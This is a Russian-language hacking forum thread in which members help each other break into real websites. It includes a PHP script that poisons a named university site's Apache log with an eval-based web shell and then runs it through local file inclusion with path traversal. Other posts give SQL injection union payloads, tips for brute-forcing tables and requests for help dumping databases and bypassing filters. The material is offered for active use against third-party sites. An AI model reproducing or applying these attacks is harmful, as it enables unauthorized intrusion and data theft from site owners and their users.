Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    ) Грины заманали прикалываться:)

    1. Одновременная запись данных юзер-агента в лог и их инклуд не прокатят - последовательно только
    2. Где ты увидел в логах данные user-agent-ов? Там только ip и get-ы урлов.
    3. Соответственно сначала get с php-кодом в строке URL, затем (второй раз вызов фукнции) уже инклуд

    PHP:
    <?  
    @
    set_time_limit(0);  
    @
    ini_set("display_errors","1"); 
      function 
    get($url)  
        {  
            
    $ch curl_init();    
            
    curl_setopt($chCURLOPT_URL,$url);  
            
    curl_setopt($chCURLOPT_RETURNTRANSFER,1);  
            
    curl_setopt($chCURLOPT_USERAGENT'Opera');  
            
    curl_setopt($chCURLOPT_REFERER"http://www.KAKASHKA.ru"); 
            
    $ss=curl_exec($ch);  
            
    curl_close($ch);  
            return 
    $ss;  
        }  


          
    $a=get('http://www.impan.pl/~ecmtb11/index.php?file=<?eval(stripslashes($_REQUEST[cmd]));?>');  
          
    $a=get('http://www.impan.pl/~ecmtb11/index.php?file=../../../../var/apache/logs/www.access_log&cmd=phpinfo();');
          echo 
    $a
          
    #echo 'ok'; 
    ?> 
    в общем чото в этом роде, логи там мегов на 25 по-моему, но сегодня туда уже ничего не пишется. Ну и про прокси не забывай, кхм

    PS: А вообще там нет инклуда, там fopen, но схема предоженная выше работает когда есть инклуд. Тут просто читалка файлов. Так что читай, ищи превад

    Шутку с тильдой оценил)
     
    #10661 Pashkela, 16 Dec 2009
    Last edited: 16 Dec 2009
  2. Matnya

    Matnya Banned

    Joined:
    2 Dec 2009
    Messages:
    22
    Likes Received:
    1
    Reputations:
    -15
    точно, fopen(), бля какже я не заметил. ппц совсем крыша съехала...


    PS Большой респект за консультацию. многое уточнил

    А тут по подробней плиз)
     
    #10662 Matnya, 16 Dec 2009
    Last edited: 16 Dec 2009
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    ну если вспомнить, что ты мне писал в личку, а говорили мы про тулзу, то чтобы брутить пути в ней, ссылку надо просто взять в одинарные кавычки )
     
  4. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Matnya, и у тебя хватало наглости с такими знаниями выебываться на автора лфи брутера?
     
    1 person likes this.
  5. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    http://labs.securitycompass.com/index.php/exploit-me/access-me/access-me-faq/

    https://addons.mozilla.org/en-US/firefox/addon/7595

    примерный перевод:

    В общем всех пошлют
     
  6. [х26]VОLАND

    [х26]VОLАND Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    513
    Likes Received:
    756
    Reputations:
    218
    1. Открываешь сокет.
    2. Пишешь в него запрос.
    3. Закрываешь сокет.
     
    #10666 [х26]VОLАND, 16 Dec 2009
    Last edited: 16 Dec 2009
  7. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    как я понял нету разумного обьяснения во всем рунете!!!
     
  8. [Forest]

    [Forest] New Member

    Joined:
    7 Nov 2009
    Messages:
    15
    Likes Received:
    4
    Reputations:
    0
    Можно ли провести здесь скулю?
    PHP:
    $res=mysql_query("update peolpe set name='".$_POST["name"]."' where id='".$_POST["id"]."'");
    Переменные name и id не фильтруются...
     
  9. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    https://forum.antichat.ru/thread35207.html
     
  10. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    PHP:
    Microsoft OLE DB Provider for SQL Server error '80040e14'     
    Incorrect syntax near the keyword 'order'.
    PHP:
    Microsoft OLE DB Provider for SQL Server error '80040e10'     
    Procedure or function 'USP_GetMoreOverNewsByIDStory' expects parameter '@id_stories'which was not supplied
    есть ли тут скул или просто ошибка, вроде на order by ругается и на все что после asp?id=1
     
  11. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    спс за ответ но тут не access а mssql если не ошибаюсь.
    Видимо тут просто ошибкабд и скулей врядли.
    все равно спс
     
  12. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    прошу помочь никак не могу удалит одинарную кавычку. Если убрат идет ошибка
     
  13. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    1' union select 1,2,3 from table where '1'='1
     
  14. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    помогло спс тока без кавычег 1=1
    Теперь брутит до брутит наверное или можно сначала имя дб вывести?
     
  15. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Добрый вечер!
    Подскажите пожалуйста, как сделать дамп базы данных MySQL имея логин и пароль от базы, а так же имя сайта.

    Дело в том, что domain: SITE.RU и nserver: ns1.site.ru один и тот же. Я так понял, что у них теперь свой сервер? Раньше они хостились на masterhost.ru, там был путь: https://phpmyadmin.masterhost.ru и я делал дамп, но теперь пишет:
    Что же делать? Как сделать дамп?
     
  16. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    за4ем так полу4ается ??

    не показовает//
     
  17. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Потому что таблички users не существует...

    PS: Раздражают такие люди, которые любят "п0нт@нутьSя"...
     
    #10677 mailbrush, 17 Dec 2009
    Last edited: 17 Dec 2009
    1 person likes this.
  18. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Она существует но пустая

    -1%20union%20select%201,2,3,count(*),5,6+from+users--

    ЗЫ раньше он вообще на албани писал ((
     
    2 people like this.
  19. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    спс я уже про тулзу с его выхода знаю и сам протестил))
    Тут не MySql а какой то с нестандартыми ответами Access с Jet компонентом. Все таки не смог брути таблицы никакого, наверное префикс надо гадать.
     
  20. M1ks

    M1ks Elder - Старейшина

    Joined:
    23 Aug 2007
    Messages:
    140
    Likes Received:
    9
    Reputations:
    0
    как можно выполнить инъекцию если на union на сайте стоит фильтр ?
     
Thread Status:
Not open for further replies.